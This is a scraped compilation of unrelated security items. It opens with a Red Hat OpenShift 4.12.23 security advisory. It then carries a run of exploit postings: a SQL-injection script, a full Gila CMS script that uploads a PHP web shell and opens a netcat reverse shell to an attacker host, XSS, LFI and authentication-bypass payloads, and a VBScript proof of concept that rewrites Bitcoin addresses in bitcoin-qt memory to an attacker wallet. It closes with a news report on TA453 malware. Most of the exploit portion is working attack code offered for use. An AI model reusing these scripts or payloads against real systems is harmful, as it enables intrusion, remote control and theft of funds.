Red Hat Security Advisory 2023-3925-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.12.23.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Enterprise security update  
Advisory ID:       RHSA-2023:3925-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3925  
Issue date:        2023-07-06  
CVE Names:         CVE-2022-41717 CVE-2022-41724 CVE-2022-41725  
                   CVE-2022-46663 CVE-2023-0464 CVE-2023-0465  
                   CVE-2023-0466 CVE-2023-1255 CVE-2023-2650  
                   CVE-2023-2700 CVE-2023-3089 CVE-2023-24329  
                   CVE-2023-24534 CVE-2023-24536 CVE-2023-24537  
                   CVE-2023-24538 CVE-2023-24540 CVE-2023-27561  
                   CVE-2023-32067  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.23 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.12.23. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHSA-2023:3924

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html  
Security Fix(es):

* openshift: OCP does not use FIPS-certified cryptography(CVE-2023-3089)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

You can download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
can be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are:

(For x86_64 architecture)  
The image digest is  
sha256:2309578b68c5666dad62aed696f1f9d778ae1a089ee461060ba7b9514b7ca417

(For s390x architecture)  
The image digest is  
sha256:571f9da5ab8ad0291a5fa822bd7b2803d5bf53096b140407ac442acf9dde4a99

(For ppc64le architecture)  
The image digest is  
sha256:9470deef9f3220fa1c05b555f5e10f448d2888e60f40a8e2073424dc6e672fd1

(For aarch64 architecture)  
The image digest is  
sha256:d9998b576ab98dcfd9024927572f698c0f40bf7fe4f8eff287f41ab4fa5e9c93

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2212085 - CVE-2023-3089 openshift: OCP & FIPS mode

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-10386 - [RHOCP 4.12] MetalLB operator should be able to run other than default service account  
OCPBUGS-11199 - Azure: UPI: Fix storage arm template to work with Galleries and MAO  
OCPBUGS-11303 - Incorrect domain resolution by the coredns/Corefile in Vsphere IPI Clusters | openshift-vsphere-infra  
OCPBUGS-13778 - kuryr-controller crashes on KuryrPort cleanup when subport is already gone: Request requires an ID but none was found  
OCPBUGS-13891 - CNO doesn't handle nodeSelector in HyperShift  
OCPBUGS-13940 - [4.12] Bootimage bump tracker  
OCPBUGS-14041 - Routes are not restored to new vNIC by hybrid-overlay on Windows nodes  
OCPBUGS-14190 - When Creating Sample Devfile from the Samples Page, Topology Icon is not set  
OCPBUGS-14652 - disable debug pporf with unauthenticated port  
OCPBUGS-14664 - When installing SNO with bootstrap in place it takes CVO 6 minutes to acquire the leader lease  
OCPBUGS-14803 - KCM is not aware of the AWS Region ap-southeast-3  
OCPBUGS-14873 - Hypershift operator should honor 'hostedcluster.spec.configuration.ingress.loadBalancer.platform.aws.type'  
OCPBUGS-14958 - [release-4.12] Stalld continually restarting  
OCPBUGS-15099 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')  
OCPBUGS-15198 - CPMS: Surface cpms vs machine diff  
OCPBUGS-15269 - External PKI reconcilation deploys broken due to invalid dependency on additional user ca bundles  
OCPBUGS-15309 - Bump to kubernetes 1.25.11  
OCPBUGS-15315 - IngressVIP getting attach to two nodes at once  
OCPBUGS-15377 - [4.12] Cleanup Tech debt: remove unused repo code  
OCPBUGS-15414 - (release-4.12) gather "gateway-mode-config" config map from "openshift-network-operator" namespace  
OCPBUGS-15424 - [4.12z] Duplicate acls cause network policy failure for namespaces with long names (>61 chars)  
OCPBUGS-15429 - [4.12 clone] openshift_ptp_clock_class is not updated in Prometheus metrics when the incomming ptp packets clock class is changed  
OCPBUGS-15459 - [release-4.12] gather podDisruptionBudget only from openshift namespaces  
OCPBUGS-15482 - [CI Watcher] Broken pipeline-plugin e2e tests: PipelineResource CRD isn't installed anymore

6. References:

https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2022-46663  
https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-2700  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24540  
https://access.redhat.com/security/cve/CVE-2023-27561  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-001

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkpuNUAAoJENzjgjWX9erEG+MP/i99EGZdA3rIby9AEtGWYRRA  
ISDGhB/9/pIij2jSQQbESkgse94tecBD8r0qhBd1iPbgzoeTyyL96hieIIg19ici  
iTlzNc+HtEVy0B510xXW0ILtvG61UIbA94LCI9849YISYN5+nxWfPUyn9lpAaytr  
60SeX7vDtjC0/O3XRsOT6hvCvMrlHVd5t0TR6SAMeRi7mjNQM8l9t+Qf5uIwsM+s  
itaNLWbca438pRwBZ4XRuBotbUdWCgoqT+nFrAXWMAGLCF+iyqMAzr65NwQjc9Zd  
9QVb/ez/eQiyrhr4hyBP0nqgaFRVPFZc3arUuOp7jVswxE6OR5nNKFS8xh7hQETs  
w0EZXIiuR9GODqeazxN33q9of1FGBreijDAljU+80HNlgGI69/D68Oyozgo9rP86  
Kf78FW0+OkHUFhksXz1SQBw48+yOGUOep0qRArcHS3UxzFwA+fS1oTGXmKhRtpcf  
6A/ADG0+91d3Waq2scpjWmSe9f9psjv2akFlEgp/c5CB5L+FAaxKEAiefz/RfETs  
Vda/QhO4kMjbYfbXkvmg5AGxB5de27aE9sZyK48cDMm8EPfO2iMuOVsF+Ce+oa87  
EhHrZVX4+BGKb3VgTX0p3Yzo6ArDieZkaM+JTdSb+iV/RpCwm9/FUPs6D1akdMzj  
dH9Z0dCgnuVydYdAlenW  
=rbDJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3925-01

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Lost and Found Information System v1.0 - SQL Injection# Date: 2023-06-30# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Dork : /php-lfis/admin/?page=system_info/contact_information# Tested on: Windows/Linux# CVE : CVE-2023-33592import requests# URL of the vulnerable componenturl = "http://example.com/php-lfis/admin/?page=system_info/contact_information"# Injecting a SQL query to exploit the vulnerabilitypayload = "' OR 1=1 -- "# Send the request with the injected payloadresponse = requests.get(url + payload)# Check if the SQL injection was successfulif "admin" in response.text:    print("SQL injection successful!")else:    print("SQL injection failed.")

Lost And Found Information System 1.0 SQL Injection

Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

DANGEROUS MAILER-CLONED version 2.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : DANGEROUS MAILER-CLONED V2.0 information disclosure Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://thefortune39.company.site/CLONED-VERSION-OF-DANGEROUS-MAILER-p199233403                                    || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] all users and passwords saved as clear text[+] use payload : /storage/info.txt[+] login : /login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DANGEROUS MAILER-CLONED 2.0 Information Disclosure

DaillyTools suffers from a remote command execution vulnerability.

    ====================================================================================================================================| # Title     : DaillyTools v1 command execution Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://github.com/islamoc/DaillyTools                                                                              || # Dork      : Coded by Mennouchi Islam Azeddine                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : PHP_Comments.php[+] Line : 20      Function Name : exec      Variables     :$arr[+] PHP_Comments.php?arr= pwd Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DaillyTools Remote Command Execution

CakePHP Test Suite version 2.7.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CakePHP Test Suite v2.7.0 Xss Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             || # Vendor    : https://cakephp.org/                                                                                               |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload in : <script>alert(/indoushka/);</script> or <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] create new user and post comment or in search box use payload [+] http://127.0.0.1/forum.groupethika.com/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CakePHP Test Suite 2.7.0 Cross Site Scripting

Aplikasi Sistem Informasi Kelulusan CMS version 1.0.9 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://lulus.smkn2purwokerto.sch.id/admin.zip                                                                      |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] the infected file : index.php      <?php      require "config.php";       error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));       $page=$_GET['page'];       $filename="content/$page.php";       if (!file_exists($filename))        {         include "content/home.php";        }            else        {@include "content/$page.php";}        ?>[+] LFI : /index.php?page= [Ev!l]====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Aplikasi Sistem Informasi Kelulusan CMS 1.0.9 Local File Inclusion

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : AGVirtues Galeria v2.0 Auth By Pass Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : galeria/album.php?id=                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass : ADMIN' OR 1=1#[+] http://wexpomarmorecombr/galeria/admin/album.php Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AGVirtues Galeria 2.0 SQL Injection

Memory management and protection issues in Bitcoin Core v22 allows attackers to modify the stored sending address within the app's memory, potentially allowing them to redirect Bitcoin transactions to wallets of their own choosing.

The Bitcoin app is vulnerable to hackers!

Description

Bitcoin Core Latest version 22.0 suffers from a memory management issue that enables attackers to redirect funds to their own Bitcoin address.

DATE(S) ISSUED: 06/22/2023

RISK: Critical

Businesses:

Large and medium Bitcoin miners HIGH

Home Users: LOW

Method: Remote thread execution

OVERVIEW:

The Bitcoin app on Windows is currently facing issues related to memory management and memory protection. These vulnerabilities allow attackers to modify the stored sending address within the app's memory, ultimately leading to the redirection of Bitcoin transactions to their own wallets.

Attackers Method:

The Bitcoin app is suffering from memory management issues, allowing attackers to open bitcoin’s process and search for Bitcoin wallet addresses stored in the memory. While Bitcoin uses the SHA-256 hashing algorithm to encrypt the data stored in the blocks on the blockchain, the BTC addresses themselves are not encrypted in the memory.

When a transaction occurs on the Bitcoin blockchain, it takes place through the utilization of public addresses. These public addresses are stored within the Bitcoin app prior to initiating the process.

An attacker can simply search for these BTC addresses, which consist of a string of 26-35 letters and numbers, enabling them to easily locate all the Bitcoin wallets stored in the Bitcoin app and replace them with their own.

When an attacker replaces the public address, it can result in a straightforward redirection of Bitcoin transactions to their own wallets. Due to the inherent nature of Bitcoin, this process is reversible.

This method closely resembles the widely-known point-of-sale malware called Tinypos.

My research about Tinypos can be found here:

https://securitynews.sonicwall.com/xmlpost/tinypos-a-new-multi-component-pos-family-actively-spreading-in-the-wild/

To my understanding, we can expect to see an increase in the prevalence of Bitcoin point-of-sale (POS) malware in the near future!

The major difference between Tinypos and Bitcoin malware is that Bitcoin operates in a decentralized manner without a central authority. Therefore, if you become a victim of an attack, your funds will be permanently lost!

Video of Attack:

https://www.youtube.com/watch?v=oEl4M1oZim0

In this video, I used an app called Cheat Engine to demonstrate how hacking a Bitcoin wallet works. As you can see in the video, I created a Bitcoin sending address under my name. An attacker can easily gain access to the Bitcoin memory app and replace it with another BTC wallet, causing all funds to be transferred to their own wallet during any transaction!

POC:

replace\_hash = "bc1pkwjlvljdq6huzk85d8z695v26e93dd1m0upqumkncmx640dpdu4suyukmt"   ' attacker's hash

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hWnd As Long, lpdwProcessId As Long) As Long

Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long

Private Declare Function VirtualQueryEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, lpBuffer As MEMORY\_BASIC\_INFORMATION, ByVal dwLength As Long) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

Private Const PROCESS\_ALL\_ACCESS As Long = &H1F0FFF

Private Const WM\_GETTEXT As Long = &HD

Private Const WM\_SETTEXT As Long = &HC

Private Const MEM\_COMMIT As Long = &H1000

Private Const MEM\_PRIVATE As Long = &H20000

Private Const PAGE\_READWRITE As Long = &H4

Private Type MEMORY\_BASIC\_INFORMATION

    BaseAddress As Long

    AllocationBase As Long

    AllocationProtect As Long

    RegionSize As Long

    State As Long

    Protect As Long

    Type As Long

End Type

Private Sub Bitcoin\_hack ()

    Dim hWnd As Long

    Dim processId As Long

    Dim hProcess As Long

    Dim buffer As String

    Dim processName As String

    Dim searchString As String

    Dim replacementString As String

    processName = "bitcoin-qt.exe" 

    searchString = "^\[A-Za-z\]{26,35}$" ' Pattern for strings with 26-35 letters Bitcoin address

    replacementString = replace\_hash 

    hWnd = FindWindow(vbNullString, processName)

    If hWnd <> 0 Then

        ' Get the process ID

        GetWindowThreadProcessId hWnd, processId

        ' Open the process

        hProcess = OpenProcess(PROCESS\_ALL\_ACCESS, 0, processId)

        If hProcess <> 0 Then

            Dim lpMemInfo As MEMORY\_BASIC\_INFORMATION

            Dim lpBuffer As String

            Dim lpAddress As Long

            Dim bytesRead As Long

            lpAddress = 0 ' Start at the beginning of the process memory

            Do While VirtualQueryEx(hProcess, lpAddress, lpMemInfo, Len(lpMemInfo)) <> 0

                If (lpMemInfo.State = MEM\_COMMIT) And (lpMemInfo.Type = MEM\_PRIVATE) And (lpMemInfo.Protect = PAGE\_READWRITE) Then

                    ' Allocate a buffer to read the memory

                    lpBuffer = Space(lpMemInfo.RegionSize)

                    ' Read the memory

                    ReadProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal lpBuffer, lpMemInfo.RegionSize, bytesRead

                    ' Check if the buffer contains a matching string

                    If Len(lpBuffer) >= 26 And Len(lpBuffer) <= 35 And RegExpMatch(lpBuffer, searchString) Then

                        Dim writeBuffer As String

                        writeBuffer = RegExpReplace(lpBuffer, searchString, replacementString)

                        ' Write the modified text

                        WriteProcessMemory hProcess, ByVal lpMemInfo.BaseAddress, ByVal StrPtr(writeBuffer), Len(writeBuffer), 0

                    End If

                End If

                ' Move to the next memory region

                lpAddress = lpMemInfo.BaseAddress + lpMemInfo.RegionSize

            Loop

            ' Close the process handle

            CloseHandle hProcess

        Else

            MsgBox "Failed to open the process.", vbCritical

        End If

    Else

        MsgBox "The process could not be found.", vbCritical

    End If

End Sub

Private Function RegExpMatch(ByVal text As String, ByVal pattern As String) As Boolean

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    RegExpMatch = regExp.Test(text)

End Function

Private Function RegExpReplace(ByVal text As String, ByVal pattern As String, ByVal replacement As String) As String

    Dim regExp As Object

    Set regExp = CreateObject("VBScript.RegExp")

    With regExp

        .Global = True

        .IgnoreCase = True

        .Pattern = pattern

    End With

    RegExpReplace = regExp.Replace(text, replacement)

End Function

Summary:

Use Cold Wallets until they fix this!

Questions ?

Nima\_bagheri79@yahoo.com

CVE-2023-37192: The Bitcoin app is vulnerable to hackers!

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.
"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.
"When given the opportunity, TA453

Endpoint Security / Malware

The Iranian nation-state actor known as TA453 has been linked to a new set of spear-phishing attacks that infect both Windows and macOS operating systems with malware.

"TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho," Proofpoint said in a new report.

"When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok. TA453 also employed multi-persona impersonation in its unending espionage quest."

TA453, also known by the names APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group linked to Iran's Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. Most recently, Volexity highlighted the adversary's use of an updated version of a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).

In the attack sequence discovered by the enterprise security firm in mid-May 2023, the hacking crew sent phishing emails to a nuclear security expert at a U.S.-based think tank focused on foreign affairs that delivered a malicious link to a Google Script macro that would redirect the target to a Dropbox URL hosting a RAR archive.

Present within the file is an LNK dropper that kicks off a multi-stage procedure to ultimately deploy GorjolEcho, which, in turn, displays a decoy PDF document, while covertly awaiting next-stage payloads from a remote server.

But upon realizing that the target is using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN application, but in reality, is an AppleScript that reaches out to a remote server to download a Bash script-based backdoor called NokNok.

UPCOMING WEBINAR

🔐 Privileged Access Management: Learn How to Conquer Key Challenges

Discover different approaches to conquer Privileged Account Management (PAM) challenges and level up your privileged access security strategy.

Reserve Your Spot

NokNok, for its part, fetches as many as four modules that are capable of gathering running processes, installed applications, and system metadata as well as setting persistence using LaunchAgents.

The modules "mirror a majority of the functionality" of the modules associated with CharmPower, with NokNok sharing some source code overlaps with macOS malware previously attributed to the group in 2017.

Also put to use by the actor is a bogus file-sharing website that likely functions to fingerprint visitors and act as a mechanism to track successful victims.

"TA453 continues to adapt its malware arsenal, deploying novel file types, and targeting new operating systems," the researchers said, adding the actor "continues to work toward its same end goals of intrusive and unauthorized reconnaissance" while simultaneously complicating detection efforts.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#windows